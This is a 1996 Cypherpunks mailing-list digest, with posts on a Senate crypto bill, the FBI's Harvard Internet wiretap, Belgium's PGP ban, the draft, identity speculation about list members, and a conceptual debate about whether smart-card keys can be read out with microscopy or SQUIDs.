>and to encourage the growth of electronic commerce. Senator Burns announced
>the bill via a teleconference during a special session at the Computers,
>Freedom, and Privacy Conference in Boston, MA.
>The bill, titled the "Promoting Commerce On-Line in the Digital Age Act"
>(PROCODE), joins two recent bills introduced earlier this month (S. 1587
>and HR 3011) designed to encourage the development of strong, easy-to-use
>privacy and security products for the Internet.

Maybe I'm just naturally suspicious of the government about such things, but 
I'm wondering where the text of this new Burns bill has gotten off to.  It's 
been days since it was first described, and yet a recent trip to the CDT 
page still claims it's coming.  Well, is there a bill or isn't there?

As usual, my solution will cause some people to smile, while others will 
frown:  We should educate these politicians that whenever they claim 
they have a bill to introduce, at the very least they should be required to 
release a secure hash of their CURRENT draft version of the bill, as it sits 
in the word processor.  Later, when the finalized bill is complete, they 
will be required to release the intermediate edit (whose hash can be checked 
against that originally announced) to prove that they did, indeed, have a 
specific bill in mind.  It would also allow all citizens to see how that 
bill changed (if at all) between the time they CLAIMED the bill existed, and 
the time it is actually released in finalized text version.

(If we REALLY don't trust the politicians, we could insist that the text of 
that proposed bill be released into the hands of one of these 
supposedly-trustworthy escrow agents they seem to want US to use, which 
instructions to release it in, say, 2 weeks maximum come hell or high water. 
 All these instructions, plus the hash, will be immediately released.)

This requirement would drastically cut down on the kind of game-playing that 
may be going on regularly when a bill is claimed to be ready to introduce, 
but actually isn't.  It would prevent the politicians from "running it up 
the flagpole and seeing if anyone salutes" without that being later 
revealed.  They could still change their bills, but all of their changes will 
become documented, and thus potentially  politically incriminating.

Jim Bell
jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Mon, 1 Apr 1996 03:01:03 +0800
To: jya@pipeline.com>
Subject: Re: SNI_ffs
In-Reply-To: <199603302137.QAA08281@pipe2.nyc.pipeline.com>
Message-ID: <glLeU1200YUvQ3Mswl@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 30-Mar-96 SNI_ffs  by John
Young@pipeline.com 
>    3-30-96 TWP reports on an Argentinian hacker who penetrated
>    a slew of sensitive networks and how the FBI tracked him by
>    getting a warrant to run a sniffer-filter at Harvard, the
>    POE.
>  
>    The hacker's dad, a Lt. Col., barks, "The Yankees don't
>    have the slightest idea about security. If a kid can enter,
>    they should be ashamed to admit it."


My panel at CFP had a former and a current AUSA on it, and we were
chatting before it started. They were quite proud of this bust and
saw it as an example of a "civil liberties friendly" investigation
they can hold up to rebut charges of violation of due process, illegal
wiretaps, and so on. (Both DoJers were involved in this case, which
was handled by the Boston office.)

One gave me the impression the DoJ had to develop custom hardware and
software for this "Internet wiretap" done without Harvard's direct
cooperation.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 1 Apr 1996 03:13:28 +0800
To: cypherpunks@toad.com
Subject: Re: SNI_ffs
Message-ID: <199603311557.KAA09394@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by declan+@CMU.EDU ("Declan B. McCullagh") on 
Sun, 31 Mar 10:42 AM


>One gave me the impression the DoJ had to develop 
>custom hardware and  software for this "Internet 
>wiretap" done without Harvard's direct  cooperation.


DoJ is probably cutting spying-sensitive Harvard some slack, or 
slyly crowing about setting up the Crimson butts with a promise 
for deniability. Is it possible that the CFP chit-chat revved 
that Janus-spin, practicing for more pervasive cyber-sleuth 
slathering of wannabe L&O insiders?


----------

   The New York Times, March 31, 1996, p. 20.


   First Internet Wiretap Leads to a Suspect

   [Excerpts of story not in the TWP]

   Stephen P. Heymann, a Federal prosecutor in Boston, said
   investigators had worked with Harvard to determine a method
   of tracking the suspect that would protect the privacy of
   legitimate users.

   He said that the Harvard system had 16,500 accounts and
   13,000 users and that about 60,000 E-mail messages each day
   moved in and out of the area where investigators were
   looking for the intruder.

   Mr. Heymann said investigators had used a high-speed
   computer to check for 10 to 15 key words that matched the
   intruder's profile. If they were not sure if an electronic
   communication containing a key word was Mr. Ardita's, the
   investigators looked at 80 characters on either side of the
   key word to make that determination. Mr. Heymann said
   investigators believed that only twice had they read a
   complete message that was not Mr. Ardita's.

   [End excerpt]







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada))
Date: Mon, 1 Apr 1996 03:57:07 +0800
To: cypherpunks@toad.com
Subject: Re: Electronic locksmiths are watching you (Belgium's ban onPGP)
Message-ID: <9603311631.AB23359@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Dave Del Torto <ddt@lsd.com> wrote:

>At 1:25 am 3/30/96, jim bell wrote:
>>We should be particularly suspicious of any hint of a pan-European ban or
>>control of encryption, because that is exactly the kind of development that
>>could usher in a secretly-negotiated treaty that might be argued to be
>>binding on the public.               [elided]

>Cypherpunks like Jim need to keep doing their homework before they make
>such quasi-factual statements.


Jim seems to analyse a situation in terms of broad principles, 
while Dave seems to focus more on specifics that would disprove Jim.

I agree with the Dave's last phrase in the sense that our models of reality
should indeed be rooted in reality.

But considering that in most european country, you are recognized guilty 
unless proven innocent, it is only non-contradictory to arrive at Jim's
conclusions.  The basic psycho-epistemology at work there is implying that.

Maybe that on the instant, ugly things are not happening, but nevertheless, 
the basic principles held about man, his nature and therefore, about how he 
should be treated leads, by their own logic, to ugly things.

JFA


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQEVAwUBMV5p5siycyXFit0NAQGSjAf/abwWK0DoLESROTPjrNgEcX66t+zFJ8X8
c1oMvDqXsUye0WKibkgiO+yQ7Cjt2Zxo1bD9luH9boX0vUPhDxtUclw64HJ7SOGK
WVVizbZLYmz5dSoOO8+0JpJUyFFgdI9LOMPjD1wIH84YwC8zjjSx/ZCPoEzt0lux
pP2l57+G3aVwvxCXBD0lm/Uwtafn3i35ZsOyuKRq802Is8BhFH1hka+SzUyuU1i2
Tcw7/WbqSklvGSkVkBxKMJot7GbBTEQMNqVH7oLECY1oTKafEnXzAKihKJYef49w
AJJpsOr5LQ9hyrKzAL9Mhzpx/DrrnIQ3BxMb7VgtbHSMjaEMJ+rS0g==
=3bz4
-----END PGP SIGNATURE-----

 Public Key at http://w3.citenet.net/users/jf_avon
    Jean-Francois Avon <jf_avon@citenet.net> 
    2048 bits key ID:C58ADD0D  1996/03/01    
fingerprint=52 96 45 E8 20 5A 8A 5E  F8 7C C8 6F AE FE F8 91 

Unsollicited commercial e-mail will be proofread at a rate of 165 $ U.S. per
hours.  Any sender of unsollicited commercial e-mail will be considered as to
have accepted the above mentionned terms.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 1 Apr 1996 08:50:24 +0800
To: John Young <cypherpunks@toad.com
Subject: Re: SNI_ffs
Message-ID: <m0u3Siz-0008zmC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:57 AM 3/31/96 -0500, John Young wrote:

>----------
>   The New York Times, March 31, 1996, p. 20.
>
>
>   First Internet Wiretap Leads to a Suspect
>
>   [Excerpts of story not in the TWP]
>
>   Stephen P. Heymann, a Federal prosecutor in Boston, said
>   investigators had worked with Harvard to determine a method
>   of tracking the suspect that would protect the privacy of
>   legitimate users.
>
>   He said that the Harvard system had 16,500 accounts and
>   13,000 users and that about 60,000 E-mail messages each day
>   moved in and out of the area where investigators were
>   looking for the intruder.
>
>   Mr. Heymann said investigators had used a high-speed
>   computer 

Hey!  They finally got those 386DX-40's working!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Mon, 1 Apr 1996 09:08:44 +0800
To: perry@piermont.com
Subject: Re: [NOISE] Cable-TV-Piracy-Punks
In-Reply-To: <199603311844.NAA20037@jekyll.piermont.com>
Message-ID: <199603311936.LAA18229@netcom15.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


"Perry E. Metzger" <perry@piermont.com> writes:

 > Or to people with access to scanning microscopy techniques
 > like STMs or AFMs. I suspect that there are lots of
 > techniques that can be successfully used. It used to be that
 > using them required the sort of facilities only available at
 > a large semiconductor manufacturer, but now I suspect that
 > it would be easy for a student at a major university, and
 > probably less easy, but still perfectly feasible, for a
 > person working at home with lots of sophisticated but fairly
 > available equipment like STMs.

We aren't talking about IC masks here.  We are talking about
electrostatic charges which would instantly leak away if the
insulation around them were in the least bit compromised.

Such data wouldn't even survive the preparation for scanning
microscopy, much less the actual inspection process.

 > They aren't immune to the laws of physics. If it can be put
 > together, it can be taken apart. I can even surmise HOW it
 > can be taken apart.

If you put something fragile inside a container which cannot be
breached without exposing the fragile thing to a destructive
environment, then the fragile thing is very unlikely to be
retrieved intact.  The specific parameters here will of course
vary with what technology is available, but I think live EEPROM
cells deep inside a multi-layer VLSI device are probably safe
from scrutiny for the lifetime of your average smart card.  Live
registers too, for that matter.

 > The Americans trust their money to the notion that no
 > counterfeiter can afford to pay a million or so for an
 > intaglio press. Do you think this is likely?

It is neither likely nor relevant.

 > In any case, I notice that the claim has changed. Before,
 > it was claimed, speciously, that modern cryptography could
 > solve this problem. Now it is claimed that the security of
 > the system depends entirely on keeping the user from
 > breaking in to a piece of equipment that they have physical
 > possession of. Pretty different story, eh?

The original scenario outlined how strong cryptography could be
used to authorize pay per view in a manner which was not
vulnerable to obvious hacking.  The successful use of strong
cryptography depends upon keeping certain key information secret,
and it was postulated as part of the scenario that this could be
done within a smart card.

An endless metaphysical quibble over whether God can create a
smart card he can't peek into does not serve to further
illuminate the cryptographic issues under discussion.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: vasudeva@mindport.net
Date: Mon, 1 Apr 1996 05:36:53 +0800
To: cypherpunks@toad.com
Subject: Medusa's Tentacles
Message-ID: <199603311652.LAA27625@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain



(Please forgive the uninformed method of my inquiry.)

Would any here happen to know where I might come across a later 
version of 'Medusa's Tentacles?'  I've got the first release, 
alpha/beta 1, but, as many probably know, it carries a few bugs, such 
as not allowing purging of fuzzybases...




...vasudeva

___________________________________
'Hot water is the revolutionist's 
element.  You clean men as you 
clean milkpails: by scalding them.'
            -GBS 

PGP messages encouraged - 
look at MIT keyserver for
public key.
___________________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JonWienke@aol.com
Date: Mon, 1 Apr 1996 04:11:41 +0800
To: cypherpunks@toad.com
Subject: Re: So, what crypto legislation (if any) is necessary?
Message-ID: <960331120551_366431213@emout06.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


>My preferred and soon to be permanent e-mail address:unicorn@schloss.li
>"In fact, had Unicorn not existed,       potestas scientiae in usu est
>Detweiler might not have had to invent him."    in nihilum nil posse reverti
>00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information

Unicorn = Detweiler = Agent Provocateur





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 1 Apr 1996 08:07:26 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] Cable-TV-Piracy-Punks
Message-ID: <ad841310010210042650@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:34 PM 3/31/96, jim bell wrote:
>At 11:59 PM 3/30/96 -0800, Mike Duvos wrote:

>>Perhaps our resident VLSI and Alpha Particle expert, Timothy C.
>>May, could give us a guess as to whether Perry's "Nasty
>>Mechanism" is more or less likely than Maxwell's "Daemon."

I wrote a reply to this, about decoder cloning and fingerprinting, but my
Mac froze up for some reason...must be a message. Maybe I'll rewrite it...

Then I saw this comment, and my sense of irony was triggered:

>I don't know what Tim May will tell you, but over 10 years ago a technology
>was developed which is something like a scanning electron microscope,
>however with very low beam energies and is designed to be able to scan a
>chip and quantitatively measure the voltage at various/all points on the
>chip.  It can be thwarted by a thick coating on the chip, but most organic
>coatings can be removed with  a "plasma asher," a chamber designed to remove
>photoresist coatings on chips.

I wrote a paper on this, "Dynamic Fault Imaging," using voltage contrast
combined with image processing and chip data bases to locate the origins of
glitches and faults in microprocessors. However, voltage contrast is a lot
older than 10 years, and was in use in the early 70s--my group just
developed a kind of "time machine" for watching the propagation of
defective states inside complex logic devices.

Using such methods to look at the internal state of logic or memory devices
is incredibly difficult, though a sufficiently determined analyst might
discover some interesting things. (Check the archives for several articles
I've written on tamper-resistant and tamper-responding hardware.)

Hardware fingerprinting is an economic win over reverse-engineering
analysis to the extent that it costs a huge amount more to get a particular
key than the value of what's in the key.

--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Mon, 1 Apr 1996 09:35:26 +0800
To: ravage@ssz.com (Jim Choate)
Subject: Re: [NOISE] Cable-TV-Piracy-Punks (fwd)
In-Reply-To: <199603311954.NAA18479@einstein.ssz.com>
Message-ID: <199603312022.MAA25284@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Jim Choate <ravage@ssz.com> writes:

 > You wouldn't even have to take it apart. Just subject it to
 > analysis using SQUID's. Using this technology you would not
 > even have to physicaly touch the card, let alone remove any
 > parts of it.

Excuse me, but April Fool's Day isn't until tomorrow. Besides, all
you have to do is run the card through a transporter, and then
dump the pattern buffer to a floppy. :)

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 1 Apr 1996 07:31:29 +0800
To: cypherpunks@toad.com
Subject: Re: Navajo Code-Talkers
Message-ID: <ad8416d5020210040919@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:10 PM 3/31/96, Alan Horowitz wrote:
>Young men are still being registered for the draft. In fact, in the past
>several years, there's been a crackdown.... no draft registration, no
>federal student loan.

But what I said was there is no draft. There hasn't been one for around 20
years or so, since the "All Volunteer Army," roughly coinciding with the
end of American involvement in Vietnam.

--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@mailhost.infi.net>
Date: Mon, 1 Apr 1996 05:56:14 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Navajo Code-Talkers
In-Reply-To: <ad8389c002021004b128@[205.199.118.202]>
Message-ID: <Pine.SV4.3.91.960331130856.17166H@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


Young men are still being registered for the draft. In fact, in the past 
several years, there's been a crackdown.... no draft registration, no 
federal student loan.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 1 Apr 1996 06:59:03 +0800
To: mpd@netcom.com (Mike Duvos)
Subject: Re: [NOISE] Cable-TV-Piracy-Punks
In-Reply-To: <199603310759.XAA09261@netcom13.netcom.com>
Message-ID: <199603311844.NAA20037@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Mike Duvos writes:
> perry@piermont.com ("Perry E. Metzger") writes:
> 
>  > Why not? If the card knows its own key, then someone else
>  > can probably get the key out by some nasty mechanism.
> 
> There is no physical difference between cards.  The key
> information is stored in EEPROM, and the links which permit the
> EEPROM to be written are burned after programming is complete.
> The EEPROM data is then only accessible to intimately associated
> circuitry in its vicinity.

Or to people with access to scanning microscopy techniques like STMs
or AFMs. I suspect that there are lots of techniques that can be
successfully used. It used to be that using them required the sort of
facilities only available at a large semiconductor manufacturer, but
now I suspect that it would be easy for a student at a major
university, and probably less easy, but still perfectly feasible, for
a person working at home with lots of sophisticated but fairly
available equipment like STMs.

> Presumedly the state of the EEPROM cannot be deduced by any
> external examination of the card, and any attempt to
> incrementally abrade the card down to the relevent circuit
> elements should completely obliterate the minute charge
> differences which represent the data.

They aren't immune to the laws of physics. If it can be put together,
it can be taken apart. I can even surmise HOW it can be taken apart.

> At least, that's the theory.  The Europeans trust this technology
> well enough to let it represent real money, so presumedly they do
> not consider hacking a possibility.

The Americans trust their money to the notion that no counterfeiter
can afford to pay a million or so for an intaglio press. Do you think
this is likely?

In any case, I notice that the claim has changed. Before, it was
claimed, speciously, that modern cryptography could solve this
problem. Now it is claimed that the security of the system depends
entirely on keeping the user from breaking in to a piece of equipment
that they have physical possession of. Pretty different story, eh?

> Perhaps our resident VLSI and Alpha Particle expert, Timothy C.
> May, could give us a guess as to whether Perry's "Nasty
> Mechanism" is more or less likely than Maxwell's "Daemon."

I think he'll tell you that he doesn't know how much effort it will
take but that Intel's labs probably could manage it and that they
probably couldn't manage to build Maxwell's Demon.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Mon, 1 Apr 1996 07:30:21 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] Cable-TV-Piracy-Punks (fwd)
Message-ID: <199603311954.NAA18479@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> > Presumedly the state of the EEPROM cannot be deduced by any
> > external examination of the card, and any attempt to
> > incrementally abrade the card down to the relevent circuit
> > elements should completely obliterate the minute charge
> > differences which represent the data.
> 
> They aren't immune to the laws of physics. If it can be put together,
> it can be taken apart. I can even surmise HOW it can be taken apart.

You wouldn't even have to take it apart. Just subject it to analysis using
SQUID's. Using this technology you would not even have to physicaly touch
the card, let alone remove any parts of it.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Mon, 1 Apr 1996 14:48:31 +0800
To: ravage@ssz.com (Jim Choate)
Subject: Re: SQUID's
In-Reply-To: <199603312132.PAA18565@einstein.ssz.com>
Message-ID: <199603312236.OAA03236@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Jim Choate <ravage@ssz.com> writes:

 > Apparently you are grossly unfamiliar with the
 > characteristics and capabilities of SQUID's. To help you
 > catch up...

Actually, I am quite familiar with Superconducting Quantum
Interference Devices and the one existing commercial application
of the technology, a magnetometer probe containing a liquid
nitrogen cooled SQUID chip at its tip.

[Biography of Mr. Squid deleted]

I will still laugh at suggestions that Mr. Squid can remotely
read the EEPROM in my smart card, however.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Ben" <samman-ben@CS.YALE.EDU>
Date: Mon, 1 Apr 1996 08:40:34 +0800
To: JonWienke@aol.com
Subject: Re: So, what crypto legislation (if any) is necessary?
In-Reply-To: <960331120551_366431213@emout06.mail.aol.com>
Message-ID: <Pine.A32.3.91.960331151344.23318A-100000@FROG.ZOO2.CS.YALE.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 31 Mar 1996 JonWienke@aol.com wrote:

> >My preferred and soon to be permanent e-mail address:unicorn@schloss.li
> >"In fact, had Unicorn not existed,       potestas scientiae in usu est
> >Detweiler might not have had to invent him."    in nihilum nil posse reverti
> >00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
> 
> Unicorn = Detweiler = Agent Provocateur

Uh.  No.

Unicorn != Detweiler = Agent Provocateur

I won't post my opinions upon whom I think is an Agent Provocateur, but 
Uni isn't one.

Ben.
Ben Samman..............................................samman@cs.yale.edu
Want to give a soon-to-be college grad a job?         Mail me for a resume
Je voudrais travailler en France.  J'ai deja obtenu une autorisation de
travail.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Mon, 1 Apr 1996 15:48:53 +0800
To: Bruce Zambini <jlasser@rwd.goucher.edu>
Subject: Re: Witch Hunts
In-Reply-To: <Pine.SUN.3.91.960331160359.9821B-100000@rwd.goucher.edu>
Message-ID: <199603312326.PAA04845@netcom22.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



Bruce Zambini <jlasser@rwd.goucher.edu>
>If Mr. Unicorn is indeed Detweiller, it is in the mold of Vlad Z. Nuri, 
>who (while almost certainly Detweiller) has produced useful contributions 
>on the list, while refraining from acting out.

sigh. I don't know why this periodic identity madness visits this
list. does it have something to do with phases of the moon? do you guys
do harass everyone who hasn't personally attended a cypherpunk
meeting? are the cpunks going to implement uncrackable identity cards 
for authorizing posts before the congress does so for immigration
security?

as for your speculations, all I can say is that Mr. Unicorn is one of
the many people who seem to have violent prejudices against me posting
here because of some supposed similarity of my style to this notorious
Detweiller fellow. so it wouldn't make much sense to me if he was
really me, er, sorry, Detweiller. <g>

it seems to me that by now, people might have figured out that all this
silly identity speculation is a total waste of time (and tends only
to start flamewars) on a list that is
by official administration and consensus agreement, "anything goes".
ah, but some people are slow learners and need a lot of reiteration
before they begin to understand.

in this forum, there is only a message. the messenger is irrelevant.
we could all post anonymously and have precisely the same effect. in
fact, I don't think it would be all that bad of an idea.

>It is also worth noting that the original Detweiller, in a sense, played 
>De Sade to Tim May's Rousseau, in that he used an unorthodox, but 
>effective, critical technique.

Tim May == Rousseau??? hehehehehe. and I fail to comprehend how anyone
so universally despised as Detweiller could be considered to have 
employed any "effective critical technique". maybe I should send him
some email, but alas I perceive that to be another waste of time.

the point of this message is to say, will everyone give it a rest?
who cares? why do you think it matters?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Mon, 1 Apr 1996 09:53:22 +0800
To: cypherpunks@toad.com
Subject: SQUID's
Message-ID: <199603312132.PAA18565@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> 
>  > You wouldn't even have to take it apart. Just subject it to
>  > analysis using SQUID's. Using this technology you would not
>  > even have to physicaly touch the card, let alone remove any
>  > parts of it.
> 
> Excuse me, but April Fool's Day isn't until tomorrow. Besides, all
> you have to do is run the card through a transporter, and then
> dump the pattern buffer to a floppy. :)
> 
> --
>      Mike Duvos         $    PGP 2.6 Public Key available     $
>      mpd@netcom.com     $    via Finger.                      $
> 

Hi Mike,

Apparently you are grossly unfamiliar with the characteristics and
capabilities of SQUID's. To help you catch up...

Conductus
969 West Maude Av.
Sunnyvale, CA  94086
408-737-6700
408-737-6699 Fax

If you happen to be in Austin, TX,

Data Managemenet Associates
3636 Executive Center Dr., #216
Austin, TX  78731
512-338-4701

The product under suggestion is called 'Mr. SQUID' and is a device intended
for educational and introductory appllications. Its specifications are:

SQUID Amplifier:

     Voltage Gain                               x 10,000
     Frequency Responce                         0 - 2.8 kHz
     Voltage Noise Floor                        < 5.0 nV/ sqrt. Hz @ 10 Hz

SQUID Specifications:

      Critical Current (minimum)                5 uAmps @ 77K
      Magnetic Field Modulation (minimum)       1 uVolt @ 77K
      Int. & ext. Coil Mutual Inductance        ~75 pHenries
      Int. & ext. Coil Resistance               ~20 Ohms @ 77K

Mr. SQUID User's Guide Contents:

Typical experiments:

Resistance v Temperature of the YBCO SQUID
Flux-locked Loop
Using a Flux-locked Loop as a sensitive non-contact voltmeter
Microwave induced (Shapiro) steps @ 77K & h/e
Inductive measurement of the Tc of an HTS film
SQUID properties in pumped liquid nitrogen

The following is taken without permission and verbatim from their pamphlet

What's inside the probe?

The heart of Mr. SQUId is a small integrated circuit containing a dc SQUID
and 2 modulation coils. The SQUID itself is a superconducting ring made of
Yttrium Barium Copper oxides (Y1Ba2Cu3O7, sometimes called YBCO or 123) with
two active devices called Josephson Junctions - the basic building block of
all superconducting electronics - made by a process invented at Conductus.
The coils are made of thin film silver deposited on top of an insulating
layer. The chip in Mr. SQUID represents a remarkable level of sophistication
in a materials technology scarecly 5 years old. And, unlike any other SQUID
system currently on the market, Mr. SQUID is designed to operate in a liquid
Nitrogen bath at 77K (-169C).

What does Mr. SQUID do?

Mr. Squid is a sensitive superconducting magnetometer and can therefore be
used to detect small magnetic signals if they are properly introduced to the
SQUID. The limiting performance of Mr. SQUID is set by its economical
electronics package and by its non-superconducting modulation coils. As a
result, Mr. SQUID does not have the sensitivity of high-performance
laboratory SQUIDs and thus cannot be used to detect truly minute signals
such as those generated in the human brain.


Enjoy!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 1 Apr 1996 11:16:08 +0800
To: JonWienke@aol.com
Subject: Re: So, what crypto legislation (if any) is necessary?
In-Reply-To: <960331120551_366431213@emout06.mail.aol.com>
Message-ID: <Pine.SUN.3.91.960331155257.18816D-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 31 Mar 1996 JonWienke@aol.com wrote:

> >My preferred and soon to be permanent e-mail address:unicorn@schloss.li
> >"In fact, had Unicorn not existed,       potestas scientiae in usu est
> >Detweiler might not have had to invent him."    in nihilum nil posse reverti
> >00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
> 
> Unicorn = Detweiler = Agent Provocateur


Uh huh, whatever.

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Mon, 1 Apr 1996 10:00:06 +0800
To: cypherpunks@toad.com
Subject: Laws of physics
Message-ID: <199603312156.PAA18604@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: mpd@netcom.com (Mike Duvos)
> Subject: Re: [NOISE] Cable-TV-Piracy-Punks
> Date: Sun, 31 Mar 1996 11:36:51 -0800 (PST)
> 
> We aren't talking about IC masks here.  We are talking about
> electrostatic charges which would instantly leak away if the
> insulation around them were in the least bit compromised.

Actualy the data in a PROM is not electrostic, it is quite dynamic and the
chip itself would undergo no permanent damage if removed from the original
case and examined in the right environment (namely a good vacuum).

> If you put something fragile inside a container which cannot be
> breached without exposing the fragile thing to a destructive
> environment, then the fragile thing is very unlikely to be
> retrieved intact.

Only if you are sloppy and/or don't understand the technology.

> The specific parameters here will of course
> vary with what technology is available, but I think live EEPROM
> cells deep inside a multi-layer VLSI device are probably safe
> from scrutiny for the lifetime of your average smart card.  Live
> registers too, for that matter.

Not. Not only woud SQUID technology be applicable but STM and MNR
technologies would also be applicable to this type of hardware analysis. The
chip is simply to big to prevent this type of analysis. Get it down to
atomic scale (nanotech) and SQUIDs are about your only resource.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Mon, 1 Apr 1996 15:28:15 +0800
To: perry@piermont.com
Subject: Re: [NOISE] Nasty-Quibble-Punks
In-Reply-To: <199603312135.QAA20370@jekyll.piermont.com>
Message-ID: <199604010006.QAA10270@netcom2.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


"Perry E. Metzger" <perry@piermont.com> writes:

 > I was under the impression charges had associated fields
 > which could be detected without physically touching the
 > charged object. Silly me.

Uh huh.

 > Incidently, EEPROMs don't work by simply charging a
 > capacitor or something silly like that. No insulator is
 > perfect, no dielectric is perfect, and charge would
 > eventually leak away were that the case. However, if it
 > were, it would be fairly easy to determine the state of a
 > cell without having to get particularly close to it. Beyond
 > that, there is this insane notion you seem to have that a
 > charged object will lose its charge if the "insulator" is
 > "stripped off" -- I wasn't under the impression a vacuum,
 > for instance, was a particularly good charge carrier.

Uh huh.

 > I believe you are operating on some sort of weird faith
 > here rather than in reality. Reality is that even the
 > extraordinarily well built circuits on the Capstone and
 > similar chips that the NSA is trusting the Skipjack
 > algorithm to aren't believed to be uncompromisable -- I
 > believe the words were something to the effect of "it would
 > take the resources of a national laboratory to reverse
 > engineer" or some such.

Uh huh.

 > In any case, I don't care to debate this further. I am
 > coming to believe very strongly that you just don't know
 > what you are talking about.

High praise, considering the source.

-----

Now I am certainly not going to waste any more time trying to
explain solid state physics, how EEPROMs are put together, that
the tamper-resistant packaging of Capstone is designed to thwart
the reverse engineering of an algorithm contained on the masks
used to make the chips, or impuning the supposed powers of
"national laboratories."

However, I will observe that whenever technology is put forth for
criticism on this list, there are always a few people who insist
upon maintaining that anything can be easily defeated.

"All you have to do is <blank>" they exclaim, where <blank> may
be replaced by "Quantum Factoring", "SQUIDs", "Scanning Tunneling
Microscopy", "NP=P", "The EPR Effect", "Nanomachines", or some
other exotic notion which would be lucky if it had even achieved
a laboratory demonstration under carefully controlled conditions
much less a practical application to the problem in question.

Common to all such claims is a gross underappreciation of the
engineering difficulties involved, in this case those related to
reading logic states buried in a densely integrated digital
device without destroying them.  Something that isn't easy to do
even if the device has been designed specifically for the purpose
